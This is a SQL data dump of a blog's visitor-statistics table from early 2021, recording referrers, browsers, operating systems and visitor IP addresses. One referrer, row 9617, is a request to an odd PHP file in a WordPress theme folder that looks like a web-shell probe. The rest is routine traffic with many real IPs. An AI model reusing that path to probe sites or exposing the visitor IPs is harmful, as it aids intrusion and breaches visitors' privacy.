(9428,'2021-02-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','5.180.62.25','000',0,2,0),
(9429,'2021-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.53.114','000',0,1,0),
(9430,'2021-02-28','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','35.175.112.251','000',0,1,0),
(9431,'2021-02-28','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','218.102.106.20','000',0,1,0),
(9432,'2021-02-28','http://ictbank.ir/blog','UC Browser','Series60','2.8',NULL,NULL,'','217.146.82.122','000',0,2,0),
(9433,'2021-02-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(9434,'2021-02-28','http://ictbank.ir/blog','Chrome','Android','4.2.1',NULL,NULL,'','185.212.169.100','000',0,2,0),
(9435,'2021-02-28','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','167.99.102.248','000',0,1,0),
(9436,'2021-02-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9437,'2021-02-28','http://ictbank.ir/blog','UC Browser','Series60','5',NULL,NULL,'','92.223.89.206','000',0,2,0),
(9438,'2021-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.118.205','000',0,1,0),
(9439,'2021-02-28','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.136.78','000',0,1,0),
(9440,'2021-02-28','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','150.136.41.87','000',0,1,0),
(9441,'2021-02-28','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.45','000',0,1,0),
(9442,'2021-02-28','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','185.236.42.75','000',0,2,0),
(9443,'2021-02-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.137.162.138','000',0,33,0),
(9444,'2021-02-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(9445,'2021-02-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(9446,'2021-02-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9447,'2021-02-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(9448,'2021-02-28','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.91.138.189','000',0,1,0),
(9449,'2021-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.138.219.153','000',0,2,0),
(9450,'2021-02-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(9451,'2021-02-28','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','78.157.216.4','000',0,2,0),
(9452,'2021-03-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(9453,'2021-03-01','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','185.169.255.46','000',0,2,0),
(9454,'2021-03-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9455,'2021-03-01','http://ictbank.ir/blog','UC Browser','Android','5.0.1',NULL,NULL,'','193.176.86.108','000',0,4,0),
(9456,'2021-03-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.139.59','000',0,1,0),
(9457,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.35','000',0,1,0),
(9458,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.36','000',0,1,0),
(9459,'2021-03-01','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','194.99.105.248','000',0,2,0),
(9460,'2021-03-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(9461,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.154.232.125','000',0,1,0),
(9462,'2021-03-01','http://ictbank.ir/blog','Android Browser','Android','4.0.4',NULL,NULL,'','213.232.87.98','000',0,2,0),
(9463,'2021-03-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9464,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','18.194.196.202','000',0,5,0),
(9465,'2021-03-01','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','3.8.68.2','000',0,5,0),
(9466,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.30.36','000',0,1,0),
(9467,'2021-03-01','http://ictbank.ir/blog','Opera Devices','Unknown','Unknown',NULL,NULL,'','83.143.245.68','000',0,2,0),
(9468,'2021-03-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','217.138.219.36','000',0,2,0),
(9469,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.2','000',0,2,0),
(9470,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.69.58.136','000',0,1,0),
(9471,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.180.62.82','000',0,2,0),
(9472,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.165','000',0,1,0),
(9473,'2021-03-01','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','115.238.65.122','000',0,1,0),
(9474,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.175.214.254','000',0,1,0),
(9475,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.242.245','000',0,1,0),
(9476,'2021-03-01','http://ictbank.ir/blog','Android Browser','Android','3.2',NULL,NULL,'','77.81.139.164','000',0,4,0),
(9477,'2021-03-01','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','89.64.123.107','000',0,1,0),
(9478,'2021-03-01','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','73.175.85.150','000',0,1,0),
(9479,'2021-03-01','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','92.223.89.206','000',0,2,0),
(9480,'2021-03-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.181.170.137','000',0,2,0),
(9481,'2021-03-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(9482,'2021-03-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(9483,'2021-03-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(9484,'2021-03-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(9485,'2021-03-01','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','185.122.168.251','000',0,2,0),
(9486,'2021-03-01','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.165.158.114','000',0,1,0),
(9487,'2021-03-02','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','37.120.221.44','000',0,2,0),
(9488,'2021-03-02','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','73.175.85.150','000',0,2,0),
(9489,'2021-03-02','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','82.102.16.228','000',0,2,0),
(9490,'2021-03-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,6,0),
(9491,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.76','000',0,1,0),
(9492,'2021-03-02','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','139.28.219.84','000',0,2,0),
(9493,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','139.59.252.143','000',0,1,0),
(9494,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.36.123.2','000',0,1,0),
(9495,'2021-03-02','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','200.124.252.124','000',0,2,0),
(9496,'2021-03-02','http://ictbank.ir/blog','UC Browser','Android','4.4.2',NULL,NULL,'','194.110.114.140','000',0,2,0),
(9497,'2021-03-02','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','13.53.64.97','000',0,5,0),
(9498,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.206.169.236','000',0,2,0),
(9499,'2021-03-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','84.17.46.151','000',0,1,0),
(9500,'2021-03-02','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','194.35.233.212','000',0,2,0),
(9501,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.189.29','000',0,1,0),
(9502,'2021-03-02','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','178.159.3.169','000',0,2,0),
(9503,'2021-03-02','http://design-arena.ir/blog','Safari','iOS','12.0',NULL,NULL,'','192.71.12.140','000',0,1,0),
(9504,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','75.119.219.102','000',0,1,0),
(9505,'2021-03-02','https://www.google.com/','Firefox','Linux','Unknown',NULL,NULL,'','93.39.246.242','000',0,1,0),
(9506,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.62.242.101','000',0,1,0),
(9507,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','13.228.104.57','000',0,5,0),
(9508,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.251.241.226','000',0,5,0),
(9509,'2021-03-02','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','45.83.91.164','000',0,2,0),
(9510,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.37.21','000',0,1,0),
(9511,'2021-03-02','http://ictbank.ir/blog','Android Browser','Android','8.1.0',NULL,NULL,'','5.180.62.37','000',0,2,0),
(9512,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.105.219.249','000',0,3,0),
(9513,'2021-03-02','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','198.45.26.18','000',0,1,0),
(9514,'2021-03-02','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','195.140.215.168','000',0,2,0),
(9515,'2021-03-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(9516,'2021-03-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(9517,'2021-03-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9518,'2021-03-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(9519,'2021-03-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9520,'2021-03-02','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','132.145.155.205','000',0,3,0),
(9521,'2021-03-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(9522,'2021-03-02','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','150.136.41.87','000',0,3,0),
(9523,'2021-03-02','http://ictbank.ir/blog','Android Browser','Android','4.1.2',NULL,NULL,'','45.152.181.36','000',0,2,0),
(9524,'2021-03-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(9525,'2021-03-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.171.67','000',0,1,0),
(9526,'2021-03-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.165.200','000',0,1,0),
(9527,'2021-03-03','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','45.137.22.44','000',0,1,0),
(9528,'2021-03-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.183.2.190','000',0,1,0),
(9529,'2021-03-03','http://ictbank.ir/blog','Android Browser','Android','4.1.2',NULL,NULL,'','5.180.62.67','000',0,2,0),
(9530,'2021-03-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','50.116.36.25','000',0,1,0),
(9531,'2021-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.209.244','000',0,1,0),
(9532,'2021-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,15,0),
(9533,'2021-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.180.62.31','000',0,2,0),
(9534,'2021-03-03','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','195.206.183.232','000',0,2,0),
(9535,'2021-03-03','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','45.94.47.21','000',0,2,0),
(9536,'2021-03-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.16.205.3','000',0,2,0),
(9537,'2021-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.23.194','000',0,1,0),
(9538,'2021-03-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(9539,'2021-03-03','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','45.83.91.212','000',0,2,0),
(9540,'2021-03-03','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','95.70.145.199','000',0,1,0),
(9541,'2021-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.181.168.164','000',0,1,0),
(9542,'2021-03-03','https://www.google.fr/','Chrome','Windows','10.0',NULL,NULL,'','213.136.101.37','000',0,1,0),
(9543,'2021-03-03','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','37.120.217.196','000',0,2,0),
(9544,'2021-03-03','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.140','000',0,1,0),
(9545,'2021-03-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','2.56.154.90','000',0,3,0),
(9546,'2021-03-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9547,'2021-03-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.136.78','000',0,1,0),
(9548,'2021-03-03','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','217.138.192.52','000',0,2,0),
(9549,'2021-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.53.176','000',0,1,0),
(9550,'2021-03-03','http://ictbank.ir/blog','UC Browser','Android','4.4.2',NULL,NULL,'','92.223.89.206','000',0,2,0),
(9551,'2021-03-03','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','93.99.176.243','000',0,1,0),
(9552,'2021-03-03','http://ictbank.ir/blog','Unknown','Android','7.0',NULL,NULL,'','82.102.22.228','000',0,2,0),
(9553,'2021-03-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,2,0),
(9554,'2021-03-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(9555,'2021-03-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(9556,'2021-03-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','186.205.12.28','000',0,1,0),
(9557,'2021-03-03','www.google.com','Unknown','Android','7.0',NULL,NULL,'','45.85.90.66','000',0,1,0),
(9558,'2021-03-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.190','000',0,1,0),
(9559,'2021-03-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','195.181.170.137','000',0,2,0),
(9560,'2021-03-03','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(9561,'2021-03-03','http://ictbank.ir/blog','Yandex Browser','Windows','6.2',NULL,NULL,'','185.236.42.214','000',0,2,0),
(9562,'2021-03-04','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','81.30.228.253','000',0,1,0),
(9563,'2021-03-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(9564,'2021-03-04','http://ictbank.ir/blog','Unknown','iOS','14.4',NULL,NULL,'','186.189.239.23','000',0,2,0),
(9565,'2021-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.138.192.52','000',0,2,0),
(9566,'2021-03-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','91.235.129.81','000',0,2,0),
(9567,'2021-03-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(9568,'2021-03-04','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','191.190.122.133','000',0,2,0),
(9569,'2021-03-04','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','5.253.206.140','000',0,2,0),
(9570,'2021-03-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','194.165.16.82','000',0,1,0),
(9571,'2021-03-04','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','194.110.84.93','000',0,2,0),
(9572,'2021-03-04','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','37.59.46.112','000',0,2,0),
(9573,'2021-03-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9574,'2021-03-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','35.178.16.1','000',0,5,0),
(9575,'2021-03-04','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','5.180.62.31','000',0,2,0),
(9576,'2021-03-04','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','47.88.104.193','000',0,1,0),
(9577,'2021-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','135.181.85.48','000',0,1,0),
(9578,'2021-03-04','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(9579,'2021-03-04','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','37.120.131.68','000',0,2,0),
(9580,'2021-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.1.192','000',0,1,0),
(9581,'2021-03-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9582,'2021-03-04','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','18.197.125.181','000',0,5,0),
(9583,'2021-03-04','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','217.146.82.212','000',0,2,0),
(9584,'2021-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.23','000',0,1,0),
(9585,'2021-03-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.102.49.193','000',0,1,0),
(9586,'2021-03-04','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','194.35.233.209','000',0,2,0),
(9587,'2021-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.13.42','000',0,1,0),
(9588,'2021-03-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.176','000',0,2,0),
(9589,'2021-03-04','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','84.17.43.155','000',0,2,0),
(9590,'2021-03-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','95.235.222.143','000',0,4,0),
(9591,'2021-03-04','http://ictbank.ir/blog','UC Browser','Android','4.4.2',NULL,NULL,'','193.36.116.149','000',0,4,0),
(9592,'2021-03-04','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.52.190.187','000',0,5,0),
(9593,'2021-03-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.79.159.229','000',0,1,0),
(9594,'2021-03-04','https://www.google.com/','Chrome','OS X','10.13.0',NULL,NULL,'','94.60.216.21','000',0,1,0),
(9595,'2021-03-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9596,'2021-03-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(9597,'2021-03-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(9598,'2021-03-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(9599,'2021-03-04','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','37.120.131.155','000',0,2,0),
(9600,'2021-03-04','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','35.175.111.251','000',0,1,0),
(9601,'2021-03-04','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','141.98.103.108','000',0,2,0),
(9602,'2021-03-05','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.146','000',0,1,0),
(9603,'2021-03-05','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','194.127.172.104','000',0,2,0),
(9604,'2021-03-05','http://ictbank.ir/blog','Android Browser','Android','2.1',NULL,NULL,'','220.181.77.162','000',0,5,0),
(9605,'2021-03-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,6,0),
(9606,'2021-03-05','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','93.76.247.188','000',0,2,0),
(9607,'2021-03-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.181.170.150','000',0,2,0),
(9608,'2021-03-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.65.15.196','000',0,5,0),
(9609,'2021-03-05','http://ictbank.ir/blog','UC Browser','Android','4.4.4',NULL,NULL,'','193.36.116.161','000',0,2,0),
(9610,'2021-03-05','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','52.64.20.252','000',0,5,0),
(9611,'2021-03-05','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','116.203.98.205','000',0,1,0),
(9612,'2021-03-05','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','185.169.255.19','000',0,2,0),
(9613,'2021-03-05','http://ictbank.ir/blog','UC Browser','Android','5.1.1',NULL,NULL,'','195.206.183.241','000',0,2,0),
(9614,'2021-03-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.180.80','000',0,1,0),
(9615,'2021-03-05','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.42.79.222','000',0,5,0),
(9616,'2021-03-05','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','52.60.189.115','000',0,5,0),
(9617,'2021-03-05','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','115.142.42.239','000',0,1,0),
(9618,'2021-03-05','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','84.213.196.241','000',0,1,0),
(9619,'2021-03-05','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','141.98.103.108','000',0,2,0),
(9620,'2021-03-05','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','54.176.188.51','000',0,5,0),
(9621,'2021-03-05','http://ictbank.ir/blog','Internet Explorer','Windows','5.0',NULL,NULL,'','23.224.109.7','000',0,1,0),
(9622,'2021-03-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.47.126','000',0,1,0),
(9623,'2021-03-05','http://ictbank.ir/blog','Chrome','Android','5.1',NULL,NULL,'','194.127.172.101','000',0,2,0),
(9624,'2021-03-05','https://duckduckgo.com/','Firefox','OS X','10.16',NULL,NULL,'','213.47.34.174','000',0,1,0),
(9625,'2021-03-05','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.16.38.89','000',0,1,0),
(9626,'2021-03-05','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','37.120.131.68','000',0,2,0),
(9627,'2021-03-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(9628,'2021-03-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(9629,'2021-03-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9630,'2021-03-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(9631,'2021-03-05','http://ictbank.ir/blog','Yandex Browser','Windows','6.3',NULL,NULL,'','37.120.131.155','000',0,2,0),
(9632,'2021-03-05','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','37.120.148.182','000',0,2,0),
(9633,'2021-03-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(9634,'2021-03-06','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','37.120.144.124','000',0,2,0),
(9635,'2021-03-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9636,'2021-03-06','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','116.203.88.239','000',0,1,0),
(9637,'2021-03-06','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','196.240.57.220','000',0,2,0),
(9638,'2021-03-06','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','37.120.131.155','000',0,2,0),
(9639,'2021-03-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','54.176.188.51','000',0,5,0),
(9640,'2021-03-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','196.196.197.32','000',0,2,0),
(9641,'2021-03-06','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.171','000',0,1,0),
(9642,'2021-03-06','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','217.146.82.122','000',0,2,0),
(9643,'2021-03-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.177.183.16','000',0,1,0),
(9644,'2021-03-06','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.228.104.57','000',0,5,0),
(9645,'2021-03-06','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','217.138.207.180','000',0,2,0),
(9646,'2021-03-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.39.211.199','000',0,1,0),
(9647,'2021-03-06','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','194.35.233.161','000',0,2,0),
(9648,'2021-03-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9649,'2021-03-06','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','155.4.133.100','000',0,1,0),
(9650,'2021-03-06','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','194.150.167.80','000',0,2,0),
(9651,'2021-03-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.240.57.44','000',0,2,0),
(9652,'2021-03-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','207.154.197.170','000',0,1,0),
(9653,'2021-03-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.22.65','000',0,1,0),
(9654,'2021-03-06','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','176.222.34.111','000',0,2,0),
(9655,'2021-03-06','http://ictbank.ir/blog','Firefox Mobile','Android','11',NULL,NULL,'','188.134.82.89','000',0,1,0),
